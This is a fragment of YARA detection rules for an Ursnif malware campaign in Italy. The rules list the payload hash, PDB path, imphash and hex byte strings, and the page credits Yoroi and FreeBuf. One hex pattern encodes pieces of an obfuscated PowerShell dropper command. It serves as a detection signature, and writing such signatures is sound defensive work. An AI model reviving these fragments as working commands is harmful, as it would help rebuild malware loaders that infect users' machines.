        $s5 = {54 2E 45 6E 43 4F 44 69 6E 67 7B 5D 7D 3A 3A 41 73 43 49 69 20 7B 29 7D 20 7B 7D 7D 20 7C 46 6F 52 65 41 43 68 2D 4F 42 6A 65 63 54 7B 7B 7D 24 5F 2E 52 45 41 44 54 4F 45 6E 44 7B 28 7D 7B 29 7D 20 7B 7D 7D 20 7B 29 7D 27 20 2D 57 69 6E 20 30 31 3B 63 6C 65 61 72 3B 65 78 69 74 7E 7B 4E 55 4D 4C 4F 43 4B 7D}
        $s6 = {20 69 6D 70 6F 73 73 69 62 69 6C 65 20 63 61 72 69 63 61 72 6C 6F 2E}
    condition:
        $s1 and (1 of ($s2,$s3,$s4,$s5)) and $s6
}

rule payload_DLL_Ursnif_March_2020 {
    meta:
        description = "Yara rule for Ursnif payload - April Italian Campaign"
        hash = "E32C592819D825851BAE84A33BF5FA1A26E0A57A14C0E4B8C3E845C1117998A0"
        author = "Cybaze - Yoroi ZLab"
        last_updated = "2020-04-17"
        tlp = "white"
        category = "informational"
    strings:
        $b1 = "c:\\Above\\Industry\\Fear\\ring\\charge\\large\\set\\EarthAgainst.pdb" ascii wide
        $b2 = {00 2E 3F 41 56 72 75 6E 74 69 6D 65 5F 65 72 72 6F 72 40 73 74 64 40 40}
        $b3 = {41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A}
        $b4 = {65 00 6E 00 2D 00 ?? 00 ?? 00 00 00}
        $b5 = "A-C0F2E0B9FA8E}\\hide.me VPN\\Hide.me.exe" ascii wide
    condition:
        uint16(0) == 0x5A4D and pe.number_of_sections == 5 and pe.imphash() == "f11ff0b8c499af0d98f00299b97339cf" and any of them
}
```

*Source: Yoroi. Compiled by FreeBuf editor Avenger; please credit FreeBuf.COM when reproducing.
